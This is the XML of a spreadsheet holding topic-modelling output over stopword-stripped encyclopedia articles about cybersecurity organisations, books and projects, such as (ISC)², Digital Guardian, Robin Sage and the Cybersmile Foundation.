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427"/>
  <workbookPr/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\b\Desktop\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{1FD39367-7EBC-462F-9EED-786E04DC16F9}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="1490" yWindow="2430" windowWidth="14400" windowHeight="7370" xr2:uid="{00000000-000D-0000-FFFF-FFFF0000000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W5" i="1" l="1"/>
  <c r="W6" i="1"/>
  <c r="W7" i="1"/>
  <c r="W8" i="1"/>
  <c r="W4" i="1"/>
  <c r="W9" i="1" l="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="23806" uniqueCount="15695">
  <si>
    <t>index</t>
  </si>
  <si>
    <t>Document_No</t>
  </si>
  <si>
    <t>Dominant_Topic</t>
  </si>
  <si>
    <t>Topic_Perc_Contrib</t>
  </si>
  <si>
    <t>Keywords</t>
  </si>
  <si>
    <t>Title</t>
  </si>
  <si>
    <t>Text</t>
  </si>
  <si>
    <t>secur, inform, user, network, data, servic, manag, provid, includ, access</t>
  </si>
  <si>
    <t>(ISC)²</t>
  </si>
  <si>
    <t>international information system security certification consortium, (isc)2, non-profit organization specializes training certifications cybersecurity professionals. described "world's largest security organization". widely known certification offered (isc)2 certified information systems security professional (cissp) certification. history mid-1980s need arose standardized vendor-neutral certification program provided structure demonstrated competence field security, several professional societies recognized certification programs attesting qualifications information security personnel desperately needed. june 1988, conference hosted national institutes standards technology (nist) federal information systems security educators association (fissea) idaho state university pocatello, idaho address need standardized curriculum burgeoning profession. organizations attendance included: canadian information processing society (cips) computer security institute (csi) data processing management association special interest group certified professionals (dpma sig-cp) data processing management association special interest group computer security (dpma sig-cs) idaho state university (isu) information systems security association (issa) international federation information processing (ifip)during conference, question raised virtually every group represented, save nist isu, creating professional certification. conference participants agreed form consortium would attempt bring together competing agendas various organizations. november 1988, special interest group computer security (sig-cs), member data processing management association (dpma), brought together several organizations interested this. (isc)2 formed mid-1989 non-profit organization goal mind [8]. 1990, first working committee establish something called common body knowledge (cbk) formed. work done committee resulted first version finalized 1992, cissp credential launched 1994, followed sscp credential 2001, credential 2005, csslp credential 2008, ccfp hcispp 2013 ccsp 2015.[9] 2001, (isc)2 established europe, middle east africa regional office london. 2002, (isc)2 opened asia-pacific regional office hong kong. 2015, (isc)2 introduced north america regional office washington, d.c. since 2011, (isc)2 organizes annual (isc)2 security congress conference. 2019 conference first international iteration event held orlando, florida. professional certifications (isc)2 maintains calls common body knowledge information security following certifications: certified information systems security professional (cissp), including: information systems security architecture professional (cissp-issap) information systems security engineering professional (cissp-issep) information systems security management professional (cissp-issmp)and including: certified secure software lifecycle professional (csslp) certified authorization professional (cap) certified cloud security professional (ccsp) systems security certified practitioner (sscp) health care information security privacy practitioner (hcispp)it certified ansi (isc)2 meets requirements ansi/iso/iec standard 17024, personnel certification accreditation program. that accreditation covers cissp, sscp, cissp-issap, cissp-issep, cissp-issmp, cap, csslp certifications. continuous professional education (isc)2 certified professionals required earn continuous professional education (cpe) credits annual basis order maintain certifications. credits obtained attending industry events conferences, writing articles/book reviews/books, etc. code ethics certified (isc)2 professionals required support (isc)2 code ethics. violations code ethics investigated peer review panel, within potential revoking certification. (isc)2 (along security certification organizations) criticized lack education area ethics. also certified information systems security professional cyber security community isaca references external links (isc)2 website</t>
  </si>
  <si>
    <t>The Digital Standard</t>
  </si>
  <si>
    <t>digital standard technical standard offers product testing criteria software smart devices. consumers manufacturers standards evaluate extent product protects various digital rights including consumer privacy, information security, freedom speech, product ownership. consortium organizations including consumer reports, disconnect mobile, ranking digital rights, cyber independent testing lab, aspiration presented standard march 2017. using standard intended standard encourage consumer manufacturer evaluate discuss impact product's digital features individuals society. since standard list questions, anyone answer questions product generate evaluation. supporters standard argue answers questions either obvious manufacturers voluntarily disclose answers. goals standard include setting consumer expectations products protect them, communicating acceptable practices manufacturers, encouraging conversations sorts product behavior either beneficial harmful consumers them. evaluation criteria digital standard makes assertions digital rights: manufacturers provide information security products manufacturers provide internet privacy products manufacturers design products consumer ownership manufacturers ethical accountable whatever impact products havefrom foundation assertions, digital standard claims good products following characteristics: public participation standard work progress actively seeking comments participation anyone cares digital rights. responses time standard's release organizations established made statements contributions partnering others.a representative consumer technology association expressed wish anyone using standard evaluate product describe calculated score limitations score communicates.peiter zatko cyber independent testing said, need shed light industry really caring build quality software safety.craig newmark, speaking board member consumer reports advocate digital rights, commented standard "urgently needed." references further reading statements project organizers published third-party media: tellado, marta march 2017). "consumers must power players hacking age, victims". thehill. macdougall, geoffrey march 2017). "testing products data privacy security". boing boing. zatko, sarah october 2017). "citl digital standard: year later". youtube. con. external links official website digital standard github development discussion</t>
  </si>
  <si>
    <t>The Diana Initiative</t>
  </si>
  <si>
    <t>diana initiative computer security conference based vegas, nevada aimed supporting underrepresented minorities including women cybersecurity/ first diana initiative conference took place 2017. diana initiative founded cheryl biswas, virginie robbins, pablo breuer, elizabeth etherington michael smith. covid-19, 2022 conference held 10–11 august con. references</t>
  </si>
  <si>
    <t>Digimarc</t>
  </si>
  <si>
    <t>digimarc corporation provider enterprise software services. company's software, include digital identifiers (i.e., serialized codes digital watermarks), designed address counterfeiting, product authenticity, recycling accuracy, supply chain traceability. digimarc products created multiple industries apparel, consumer packaged goods, health beauty, automotive. with 2022 acquisition evrythng, software company based london, digimarc added digital product cloud roster products. history company founded geoff rhoads 1995. 1996, initial venture funding, company released first product: digital watermarking plug-in bundled adobe photoshop, corel micrografix software. 1997, bruce davis appointed company's first digital-watermarking patent granted. today, company nearly 1,100 innovations patented u.s. patent trademark office. 1999, company went public initial public offering (ipo) raised million. that year, company contracted consortium central banks develop global system used deterring digital counterfeiting currency. 2001, company acquired business division polaroid corporation. those assets establishment digimarc systems®, division company would eventually focus protecting authenticity driver licenses states, sold 2008. 2004, company named fastest growing companies forbes magazine.in 2015, company received emmy award technology engineering work entertainment industry. 2017, company issued 100+ patents innovations watermark application verification, augmented reality, machine learning. that year, company opened offices cologne, germany tokyo, japan. 2021, bruce davis retired succeeded riley mccormack previously served lead director digimarc board. company entered semi-industrial trials part digital watermarks initiative holygrail 2.0., initiative pulled together companies focused reducing plastic waste. november, company announced plan acquire evrythng, software company based london specializes providing products digital record web. 2022, company's digital watermarks received detection rate semi-industrial trial part holygrail initiative. also list companies based oregon references external links official website</t>
  </si>
  <si>
    <t>Digital DawgPound</t>
  </si>
  <si>
    <t>digital dawgpound (more commonly referred "ddp") group hackers, best known series articles hacker magazines 2600: hacker quarterly make, long-running webcast binary revolution radio, active forums posts high-profile hackers strom carlson, decoder, phiber optik stankdawg. stated mission propagate positive image hackers negative mass media stereotype. group welcomes members want learn hacking, attempts teach positive aspects steer away negative aspects, reinforcing hacker ethic. their goal show hackers can, regularly make positive contributions technology, society whole. history founded named stankdawg. stated reasons made many friends hacking scene thought would useful everyone begin working together organized fashion. motivated fact well known hacker groups 1980s accomplished great things hacking world mod. 1988, junior high school, stankdawg came name "sweet computer programming competition. jokingly referred teammates "the digital dawgpound". stankdawg lurked shadows hacking world many years throughout college many different pseudonyms. 1997 popped head public began becoming active many smaller hacking forums. insanely brilliant people seemed mindset positive attitude towards hacking did, decided approach couple they'd interested. there always huge emphasis technical competence variety, also strength character integrity. members good programmers hackers, importantly, they're good people. 1999 first members partnership, creativity flowed. communicated worked together stankdawg's personal site, open anyone wanted join fun. stankdawg never comfortable fact name domain many people coming site coming articles presentations really appreciating great community members around. 2002, watching site grow quickly, decided community needed created like-minded hackers gathering. this start biggest project called binary revolution attempt starting true "community" hackers. site grew, roster. members over years, membership included several staff writers 2600: hacker quarterly blacklisted! magazine including stankdawg bland_inquisitor. they frequently publish articles, provide content, appear many media sources across global interweb. members also regular speakers hacking conferences con, h.o.p.e., interzone. majority members college graduates professional experience computer industry. some work fortune companies, others entrepreneurs created successful businesses. they hold memberships mensa international high society. binary revolution best known projects binary revolution, "binrev". this project created attempt bring hacking community back together, working towards common, positive goal reclaiming name hackers. binary revolution emphasizes positive aspects hacking projects help society. variety outlets including monthly meetings, weekly radio show binary revolution radio(brr), video-based series shows called hacktv, active message board forums. binary revolution radio, often shortened "brr", small part binrev community. common people discover many podcast sites applications realize "binary revolution" refers larger community radio show. when people refer "binrev" referring radio show. they referring community projects whole, specifically focusing forums. recognition maintains blog "which refer "blawg". posts members featured technology-related sites make magazine, hackaday, hacked gadgets, others. works printed natas "backspoofing 101", spring 2007, 2600 magazine natas "ownage adsense", fall 2006, 2600 magazine black ratchet "not quite dead yet", spring 2006, 2600 magazine dual_parallel "port knocking simplified", winter 2005, blacklisted411 magazine stankdawg "the electronic deduction", winter 2005, blacklisted411 magazine dual_parallel "remote encrypted data access", fall 2005, blacklisted411 magazine stankdawg "stupid webstats tricks", fall 2005, 2600 magazine stankdawg "hacking google adwords", summer 2005, 2600 magazine stankdawg "disposable email vulnerabilities", spring 2005, 2600 magazine stankdawg "0wning universal studios florida", fall 2004, blacklisted411 magazine stankdawg "how hack lottery", fall 2004, 2600 magazine stankdawg "robots spiders", winter 2003, 2600 magazine ntheory "backspoofing: telco walking", july 2004, magazine issue ntheory "packet8 phone service", july 2004, magazine issue dual_parallel "white wi-fi", july 2004, magazine issue hacnslash receiver pc", july 2004, magazine issue stankdawg "hacking 101: directory transversal", july 2004, magazine issue ntheory "hacking coinstar", september 2003, magazine issue w1nt3rmut3 "best insecurities: revisited", september 2003, magazine issue bland_inquisitor "kismet knoppix install", september 2003, magazine issue dual_parallel physical security primer community", september 2003, magazine issue logan5 "case modeling", september 2003, magazine issue vooduhal "insecurities cafe cup", september 2003, magazine issue stankdawg "hacking 101: targeting theory", september 2003, magazine issue bland_inquisitor "denial service attacks, tools tools", 2003, magazine fall 2003, 2600 magazine issue stankdawg "hacking 101: footprinting system", 2003, magazine issue evo_tech "your rights already lost them", 2003, magazine issue nick84 stankdawg "2600 secrets", 2003, magazine issue nick84 "watching watchers", 2003, magazine issue dual_parallel "public ttys: description methodologies free calling", 2003, magazine issue bland_inquisitor "cookies: good, bad, ugly", 2003, magazine issue stankdawg newbies guide ghettodriving", 2003, magazine issue w1nt3rmut3 "phreaking italy", 2003, magazine issue w1nt3rmut3 "best insecurities", spring 2003, 2600 magazine bland_inquisitor "honeypots: building better hacker", winter 2002, 2600 magazine stankdawg history 31337sp34k", fall 2002, 2600 magazine bland_inquisitor "telezapper, telemarketers, tcpa", fall 2002, 2600 magazine dual_parallel "retail hardware revisited", spring 2002, 2600 magazine stankdawg "transaction based systems", spring 2002, 2600 magazine dual_parallel "hacking retail hardware", fall 2001, 2600 magazine stankdawg "batch interactive", summer 1999, 2600 magazine online stankdawg "wardriving mickey", october 2005 dual_parallel bland_inquisitor "slackware 10.2 tips", september 2005 logan5 "the ipod: it's music anymore", january 2005 bland_inquisitor "kodak picture maker: in's out's", december 2004 stankdawg "hackers insomnia", october 2004, frequency zine dual_parallel bland_inquisitor "basic slackware security", april 2004 stankdawg "scanning go.msn.com", 2004, radical future zine issue stankdawg "fun flipit chatbot", december 2003, outbreak zine issue stankdawg bi0s "inside circuit city", december 2003, outbreak zine issue hacnslash "dumpster diving science?", september 2003 bland_inquisitor "social insecurity", december 2003, radical future zine issue ntheory "generating millisecond accurate, multi-frequency wave files perl", july 2003 stankdawg "dmca googlefight.com", december 2002, outbreak zine issue stankdawg "basic directory transversal", november 2002, outbreak zine issue stankdawg "hacking movies", winter 2002, radical future zine issue stankdawg "aim transcript (campaign freedom)", winter 2002, radical future zine issue presentations stankdawg "binary revolution radio season live!", july 2006, h.o.p.e. number stankdawg "the electronic deduction", march 2006, interz0ne july 2006, h.o.p.e. number stankdawg "hacking google adwords", july 2005, black ratchet (with strom carlson) your telephone company...with asterisk", july 2005, stankdawg "hacker radio", july 2004, fifth h.o.p.e. (guest panelist) stankdawg "as/400: lifting veil obscurity", july 2004, fifth h.o.p.e. stankdawg "disposable email vulnerabilities", march 2004, interz0ne 4jagan rider "binary revolution radio season live!", july 2006, h.o.p.e. number stankdawg "the electronic deduction", march 2006, interz0ne july 2006, h.o.p.e. number sixhe haker mobiltnfounsinsniuiuuyttyukkkuad notes external links projects digital dawgpound weblog binary revolution main site founded hacking community binary revolution magazine printed hacking magazine binary revolution radio weekly hacking radio show presented members (07/2003-current) binary revolution meetings monthly hacker meetings encourage participation offers free hosting meetings hackradio streaming radio station offer shows are, "all hacking, time" hacktv first full-length regular hacking video show hacker events calendar hacking conferences, events, meetings, related gatherings hacker media portal hacking, phreaking, related media shows skool phreak home many phreaking related text files radio freek america archives phreak phactor world's first hacking reality radio show project wal+mart freedom comprehensive directory things great devil consumerism, wal+mart, offer phreaks hackers radio freek america weekly radio show technology, privacy freedom (02/2002 02/2004) will hack food secure disposable temporary email accounts</t>
  </si>
  <si>
    <t>The Dark Net</t>
  </si>
  <si>
    <t>dark net: inside digital underworld 2014 nonfiction book jamie bartlett. published united kingdom heinemann, united states melville house publishers, australia random house. bartlett discusses online communities away mainstream, including deep web. discusses darknet dark broad terms, describing range underground emergent subcultures, including social media racists, girls, self harm communities, darknet drug markets, cryptoanarchists transhumanists. contents throughout book, bartlett discusses history online communities trolling, well development cryptocurrencies internet crime. included interactions amir taaki, various internet trolls, person downloads pictures child abuse, neo-nazi activists. bartlett stated found "positive, helpful constructive" subcultures internet well "destructive" ones. reception dark received generally positive critical reviews. hargreaves, university cardiff professor digital economy, wrote review posted london school economics political science review books author "sets chiefly report rather judge." spectator, michael bywater wrote book "necessary reading" many users unaware certain communities aspects internet. andrew mcmillen wrote australian book "covers ground [...] without becoming bogged technical minutiae." smith guardian described intelligent revealing introduction denizens web's underworld." wendy grossman zdnet stated "overall, though, book's great contribution non-sensationalist reporting touchy subjects." burrell wrote independent scant evidence positive internet communities within book. references external links excerpt posted medium.com halpern, (2015-10-08). depths net" (pdf). york review books. preview link book review dark "the dark inside digital underworld jamie bartlett". kirkus reviews. 2015-05-05.</t>
  </si>
  <si>
    <t>Robin Sage</t>
  </si>
  <si>
    <t>robin sage fictional american cyber threat analyst. created december 2009 robin casey thomas ryan, controversial security specialists white hackers york city. name taken training exercise united states army special forces. fictional biography according sage's social networking profiles, 25-year-old "cyber threat analyst" naval network warfare command norfolk, virginia. graduated allegedly years work experience, despite young age. ryan created several accounts name sage popular social networks like facebook, linkedin, twitter etc. used profiles contact nearly people, security specialists, military personnel, staff intelligence agencies defense contractors. pictures taken pornography-related website order attract attention.despite fake profile real-life information, sage offered consulting work notable companies google lockheed martin. also received dinner invitations several male contacts.not everyone fooled sage's profiles, ryan admitted cover already blown second day, several sage tried befriend attempted verify identity using phone number provided, checking email addresses outside social networking sites using alumni network find her. others recognized fake identity sage based implausible profiles. central warning issued profile, users continued connect sage despite warnings security problems revealed using contacts, ryan befriended women ages short time period december 2009 january 2010. almost working united states military, government companies (amongst organizations befriend sage fbi). using contacts, ryan gained access email addresses bank accounts well learning location secret military units based soldiers' facebook photos connections different people organizations. also given private documents review offered speak several conferences. "getting robin sage" ryan presented findings speaker "black hat" conference vegas presentation called "getting robin sage". explained short experiment proves seemingly harmless details shared social networking pages harmful also many people entrusted vital sensitive information would share information readily third parties, provided managed capture interest. concluded findings could compromised national security terrorist organization employed similar tactics. also honey trapping sexpionage references</t>
  </si>
  <si>
    <t>Digital Guardian</t>
  </si>
  <si>
    <t>digital guardian american data loss prevention software company produces products designed detect stop malicious actions users malware endpoints. digital guardian provides software end-user level corporate networks, servers, databases, cloud. these products designed detect stop malicious actions users malware endpoints. puts data events context applies granular rules protect threats.the company holds patents technology. customers include global 2000 companies, well seven largest brands world. considered leader global data loss prevention market. history company founded 2003 name verdasys. from start, flagship product digital guardian, data-centric security platform monitoring encrypting proprietary sensitive information passing desktop, laptop, enterprise server.in 2008, verdasys launched sitetrust, encryption software service banks, brokerages, companies served customers internet legally liable losses online fraud. client-side software package turned whenever user visited website protected sitetrust service spawned instance user's browser, shutting malware creating secure space around communications protected site.an agreement verdasys fidelis security systems (now fidelis cybersecurity) 2010 enabled customers acquire implement integrated solution consisting fidelis network appliances digital guardian enterprise information protection single offering verdasys.in early 2012, verdasys expanded data leak prevention portfolio cloud help enterprises protect data stored networks reduce costs. when customers, large insurance company, requested verdasys take monitoring protecting data, verdasys introduced offerings: managed service information protection (msip) information protection service (ipaas), offering data protection managed service. digital guardian platform completed eal2+ evaluation communications security establishment's common criteria evaluation certification scheme december 2012.verdasys introduced data connector 2013 contained malware threats detected fireeye's platform. before verdasys' connector, malware handled manually. december, gartner's magic quadrant placed digital guardian among five leaders global data loss prevention market.ken levine, previously mcafee executive, joined company 2014 focused simplifying product. march, verdasys raised million venture funding, bringing company's total raised capital million. funding round existing investors pension trust fairhaven capital, new, individual investment brookline venture partners.in march 2014, identity finder partnered verdasys, bringing sensitive data manager, capable automatically finding, classifying securing sensitive information. august year, verdasys changed name digital guardian increased staff 150. time, security software installed million servers, laptops devices.in october 2014, company acquired armor5, provider cloud control solutions focusing specifically preventing employees bring mobile device work copying removing company files data.in 2015, company acquired savant protection, enabling organizations deploy unique agent whitelisting applications used particular endpoint. when blue coat systems launched alliance ecosystem endpoint detection response july 2015, digital guardian among alliance-founding members. ecosystem allows sharing actionable intelligence gathered endpoint security solutions. also july, consulting firm atos digital guardian partnered deliver atos’ cloud-based data loss prevention service.in october, company bought code green networks, based silicon valley, contributed true gear. acquisition code green networks provided digital guardian network, discovery, cloud data loss prevention.the company added customers 2015, bringing total count nearly 500, including general electric dupont. year, digital guardian announced million funding, firm's largest round since founded. returning investors round pension trust (advised asset management), fairhaven capital partners, loring wolcott coolidge, special situation funds brookline venture partners. investors partners, mass mutual ventures (the corporate venture capital massachusetts mutual life insurance company) venture unit siemens financial services. company raised $135 million since founding.in january 2016, gartner's magic quadrant enterprise data loss prevention placed digital guardian among four leaders global data loss prevention market fourth consecutive time. bostinno included digital guardian among boston tech firms watch 2016. company placed 148th list cybersecurity firms world, released cybersecurity ventures 2015. products services data loss prevention software platform, digital guardian integrates content, context location awareness along encryption data level controls reduce risk information loss misuse, purposeful data theft. host-based security technology empowers organizations monitor, control, audit prevent data wrongful disclosure malicious theft, automatically enforcing data security policies procedures. this scalable platform provides multiple, independent layers protection enable secure data sharing across physical, virtual, mobile cloud environments.the architecture platform three parts: digital guardian data visibility control enables users understand organization's sensitive data used kernel-level data visibility, also delivering device control encryption. digital guardian data loss prevention adds deeper data visibility fine-grained control protection stop insider threats, includes advanced classification context, content user email file control encryption. digital guardian advanced threat protection provides real-time threat protection following attack sequence initial contact many attack stages, offering flexible controls defend manner commensurate customer's risk tolerance. also extends existing security ecosystem integrations network solutions, like fireeye, siem technologies, splunk.digital guardian allows businesses host manage premise choose managed security programs. when deployed managed service, digital guardian collect actual data itself. rather, aggregates metadata files documents watches patterns activity. metadata encrypted, hashed digitally signed transferred digital guardian's hosting facilities fips 140-2 certified messaging protocol. digital guardian provides updated analytics, alerts reports. administrators continuously monitor data, application system access usage, whether users online, offline virtual environments. organizations apply specific risk-based policy controls adhere data governance compliance rules.for example, health service organization cigna uses digital guardian software monitor ports encrypt data transfers. when employees transfer files flash drive, prompted type reasons transfer. data actually transferred compared reasons.digital guardian also provides support sharefile file sharing storage systems, extending data loss prevention capabilities organizations support virtual desktops. references external links official website</t>
  </si>
  <si>
    <t>The Hacker Crackdown</t>
  </si>
  <si>
    <t>hacker crackdown: disorder electronic frontier work nonfiction bruce sterling first published 1992. book discusses watershed events hacker subculture early 1990s. notable topic covered operation sundevil events surrounding 1987–1990 legion doom network: raid steve jackson games, trial "knight lightning" (one original journalists phrack), subsequent formation electronic frontier foundation. book also profiles likes "emmanuel goldstein" (publisher 2600: hacker quarterly), former assistant attorney general arizona gail thackeray, fletc instructor carlton fitzpatrick, mitch kapor, john perry barlow. 1994, sterling released book internet afterword. historical perspective though published 1992, released freeware, electronic book 1994, book offers unique colorful portrait nature "cyberspace" early 1990s, nature "computer crime" time. events sterling discusses occur cusp mass popularity internet, arguably achieved critical mass late 1994. also encapsulates moment information revolution "cyberspace" morphed realm telephone modems bbs' internet world wide web. critical reception cory doctorow, voiced unabridged podcast book, said "inspired politically, artistically socially". quotations future person node [internet]. person publisher. it's better media have. it's possible. [john perry] barlow first commentator adopt william gibson's striking science-fictional term "cyberspace" synonym present- nexus computer telecommunications networks. barlow insistent cyberspace regarded qualitatively world, 'frontier.' according barlow, world electronic communications, made visible computer screen, could longer usefully regarded tangle high-tech wiring. instead, become place, cyberspace, demanded metaphors, rules behaviors. term, barlow employed struck useful chord, concept cyberspace picked time, scientific american, computer police, hackers, even constitutional scholars. 'cyberspace' seems likely become permanent fixture language. electronic landscape changes astounding speed. living fastest technological transformation human history. glad chance document cyberspace moment long mutation; kind strobe-flash maelstrom. paid serious attention every rumor hacker kids, would hear kinds wacko saucer-nut nonsense: national security agency monitored american phone calls, tracked traffic bulletin-boards word-analysis programs references external links editions book english plain-text version project gutenberg rich-text version html, epub, markdown formats feedbooks.com version table contents html-formatted version hosted ebooks@adelaide archived 2015-02-07 wayback machine (university adelaide) translations formats czech translation hacker crackdown audiobook hacker crackdown</t>
  </si>
  <si>
    <t>Digital Transmission Content Protection</t>
  </si>
  <si>
    <t>digital transmission content protection (dtcp) digital rights management (drm) technology restricts digital home technologies including players televisions encrypting interconnections devices. this permits distribution content devices personal computers portable media players, also implement dtcp standards. dtcp also referred "5c" content protection, reference five companies created dtcp; hitachi, intel, matsushita, sony, toshiba. standard originally proposed february 1998, five companies presented system copy protection technical working group (cptwg), body organized evaluate technologies. five companies subsequently established digital transmission licensing administrator (dtla) june 1998 simplify licensing procedures promote acceptance dtcp method content providers, electronics manufacturers, broadcast service providers. they also released digital transmission content protection white paper describing system. paper specifies hitachi's cipher baseline encryption system, already widespread japanese cable industry. time, firewire widely regarded up-and-coming standard interconnecting media devices, although widely adopted decade following. more recently appears move using tcp/ip carried high-speed ethernet wifi connections replace firewire similar systems, move epitomized apple dtcp standard branched cover variety media types respond industry changes, supports usb, wifi, bluetooth most media standard automotive platforms) addition firewire. dtcp specification proprietary disseminated members, agree dtla agreements (some fees need paid even specification). "informational version" specification, omitting critical details implementation, freely available. dtcp+ november 2010 digital transmission licensing administrator proposed enhancements dtcp known dtcp+. this enhanced specification completed january 2011. dtcp+ adds following capabilities: digital only token “media agnostic” carry content management information (cmi) copy count remote access capability also high-bandwidth digital content protection digital rights management encrypted media extensions defective design trusted computing hardware restriction references external links dtla home page security analysis digital transmission copy protection specification</t>
  </si>
  <si>
    <t>Digital Watermarking Alliance</t>
  </si>
  <si>
    <t>digital watermarking alliance group like-minded companies share common interest furthering adoption digital watermarking. mission digital watermarking alliance create awareness promote value digital watermarking content owners, industry, policy makers, consumers." founding members digital watermarking alliance made companies established presence digital watermarking technology solutions market. member companies include: cinea digimarc research jura mediagrid media science international (msi) philips signum teletrax thomson cinavia [was verance] verimatrix, inc. current members january 2018, digital watermarking alliance companies members. contentarmor irdeto markany media science international (msi) nexguard verimatrix also digital watermarking watermark watermark detection watermark (data file) copy attack copy protection references external links official website</t>
  </si>
  <si>
    <t>The Cybersmile Foundation</t>
  </si>
  <si>
    <t>cybersmile foundation international nonprofit organization committed tackling forms cyberbullying digital abuse. they promote kindness, diversity, inclusion professional support services, education programs, awareness campaigns corporate partnerships.launched 2010, cybersmile foundation registered u.k. charity registered 501(c)3 nonprofit organization united states. main headquarters london, palo alto york. mission cybersmile foundation believe everybody right access enjoy benefits connected digital world offers without fear bullying, threats abuse.the organization believes cyberbullying, harassment digital abuse holding many people back enjoying benefits access internet provide. cybersmile believes current online environment lacks balance social rules engagement cultivated generations, governing behavior relationships communities live, play work physical world. cybersmile foundation work help people realize true potential supporting bullied abused online, changing behavior bullies education preparing generations safe positive digital future. activities support cybersmile foundation operates global support service provides internet users support cyberbullying online abuse related problems around world. cybersmile support advisors trained volunteers targeted cyberbullying themselves. education cybersmile foundation provides online educational resources covering topics including cyberbullying, doxing, netiquette, mental health, gaming, online security digital citizenship.the organization provides educational content schools. cybersmile ambassadors also participate workshops give talks children dangers cyberbullying.in november 2017, cybersmile parenting youth development advisor deborah gilboa organized tedxyouth conference pittsburgh discuss ideas impact internet young people. number speakers participated event including author educational speaker cindy pierce, discussing themes around building social courage.in august 2019, organization announced making educational workshops free schools, colleges, universities community groups. over individual lesson plans divided groups 5-16+ made available download website. advisory december 2012, britain’s crown prosecution service issued guidelines cases cyberbullying assessed existing laws. cybersmile foundation consulted part development guidelines.in september 2017, cybersmile announced launch advisory panel number industry experts fields gaming, education, research, internet technology. october 2017, cybersmile invited participate disney-abc’s #choosekindness initiative national bullying prevention awareness month. cybersmile representative laura lewandowski discussed teen mental health organization’s work news anchor cheryl jennings part abc7’s “beyond headlines” roundtable special. gaming cybersmile foundation provides online support gamers streamers affected abuse harassment online. organization also regularly participates esports events live streamed gaming marathons year.in september 2015, cybersmile launched gaming support center featuring video game specific help support resources well dedicated blog news feeds industry professionals.in november 2015 intel masters extreme event jose, mark cuban delivered number “f-bombs” interview fined total $30,000. this donated cybersmile additional $38,000 raised “league legends” match.in 2017, cybersmile participated live london comic esl, discussing support services available gamers. “the cybersmile olympics” streamed live included fundraiser viewers could donate.in august 2017, cybersmile partnership riot games launched league legends high school club initiative australia zealand. project aimed cultivate good sportsmanship young students helped learn skills encouraging positive school culture.in july 2018, michael hicks, developer louis launched game xbox, steam called path motus, partnering cybersmile foundation donating percent game’s proceeds.in april 2019, mixer, microsoft’s game streaming platform cybersmile launched partnership address cyberbullying, announcing joint unawareness movement campaign. cybersmile assistant october 2018, cybersmile foundation partnership rimmel announced development virtual assistant help people affected online abuse provide resources users english speaking countries around world.cybersmile assistant recommend helplines, organizations articles, providing localized information best serve individual user wherever world.in march 2019, cybersmile assistant launched received support renowned experts organizations including charles sophy, medical director county angeles department children family services, born this foundation carol todd, mother suicide victim amanda todd founder amanda todd legacy society. research coincide stop cyberbullying 2015, cybersmile released original research carried partnership sugarscape, examining current teen attitudes towards online bullying social media.the report revealed cyberbullied admitted suffered five separate incidents online abuse.in june 2017, cybersmile released original research carried across united states united kingdom 50,000 respondents. survey focused bystander experiences internet behaviors. topics included racism, homophobia, harassment, religion social media abuse. professional memberships cybersmile founding member twitter trust safety council help maintain free expression. also member all-party parliamentary group bullying member council child internet safety. campaigns body positivity cybersmile foundation launched online campaign communications agency adam&amp;eveddb address online bullying harassment social media promoting body positivity.instagram influencer chessie king participated campaign series images video released channel, altered live received comments abuse show social media users words distorting her. video compiled showing king’s transformation unrecognizable version herself. campaign received international news coverage number awards including gold lion 2018 cannes lions international festival creativity. #tweetforacause twitter chose cybersmile launch partner inaugural #tweetforacause initiative, driving awareness organization’s mission address cyberbullying online abuse.cybersmile along creator network niche, coordinated global call-to-action number internet personalities including josh peck, king bach, sara hopkins, duo, matt cutshall trey kennedy. participants invited #tweetforacause hashtag share messages twitter support cybersmile. hope’s story cybersmile foundation partnered pixelberry studios role-playing game high school story. game, players create high school featured hope’s story, collaborative storyline developed cybersmile writing team pixelberry studios around theme cyberbullying educate young players game. branded in-game products could purchased support cybersmile’s work.during campaign, cybersmile teamed music band direction announced giveaway included unique items tickets concert rose bowl pasadena where tour.in total, million young players educated campaign around dangers cyberbullying. pixelberry studios pledged raise $100,000 cybersmile 2014 ended raising $300,000. give blood fight cyberbullying cybersmile philippine cross teamed national incentive across philippines donate blood order save lives raise awareness cyberbullying internet trolling. internet users invited #imacybersmiler hashtag share positive memes. filtered life teaming star stephen curry brita, cybersmile launched initiative “filter your feed” tool help users screen negativity online.the campaign launched featured stephen curry guest speakers addressing online abuse harassment online. brita pledged donate every negative comment deleted positive post created using #filteryourfeed hashtag. stephen curry also appeared late late show james corden highlighted campaign carpool karaoke. campaign garnered million impressions social media traditional outlets. #iwillnotbedeleted cybersmile rimmel launched global campaign tackle beauty cyberbullying featuring prominent bloggers, campaigners celebrities including rita cara delevingne.in interview glamour, rita stated experienced cyberbullying certain degrees think it’s vital spread message it’s real thing. anxiety, cyberbullying, people things bullying it’s uncalled for.” unawareness movement mixer, microsoft's game streaming platform cybersmile launched unawareness movement raise awareness toxicity impact cyberbullying internet users encouraging positive online behaviors. this involved month-long campaign gamers xbox, mixer mixer could support movement purchase embers, virtual currency unlocked anti-cyberbullying themed skills mixer streamer channels. stop cyberbullying each year friday june, cybersmile coordinates stop cyberbullying day, global awareness encourage positive digital citizenship. stop cyberbullying engages internet users, brands, influencers, health organizations governments promote kinder, brighter internet.in 2018, cybersmile foundation received support influencers stop cyberbullying thunderclap campaign, reached million internet users. celebrities including zoella, celine dion william shatner among supporters day.in 2019, stop cyberbullying backed leaders, celebrities organizations including pope francis, cara delevingne, rita ora, little mix, unicef, charity, hockey canada, rimmel london, department education twitter. partnerships cybersmile announced various partnerships brands around world including microsoft, brita, riot games, twitter, esl, intel, wwe, rimmel, claire’s pixelberry studios. 2014, cybersmile foundation became media partner sugarscape, online teen magazine.in august 2014, twitter announced long-term partnership cybersmile promote digital citizenship educate users safe online. part partnership, verified twitter help channel @askcybersmile created provide support users platform, also listed twitter’s trusted resource area.in january 2015, intel launched ‘diversity technology' initiative, announcing number charitable partners including cybersmile foundation. company pledged $300 million several years increase inclusivity gaming industry provide support female gamers.in october 2015, body shop foundation announced support cybersmile help fund create downloadable digital programs, educating people cyberbullying online safety worldwide.in october 2016, cybersmile chosen riot games 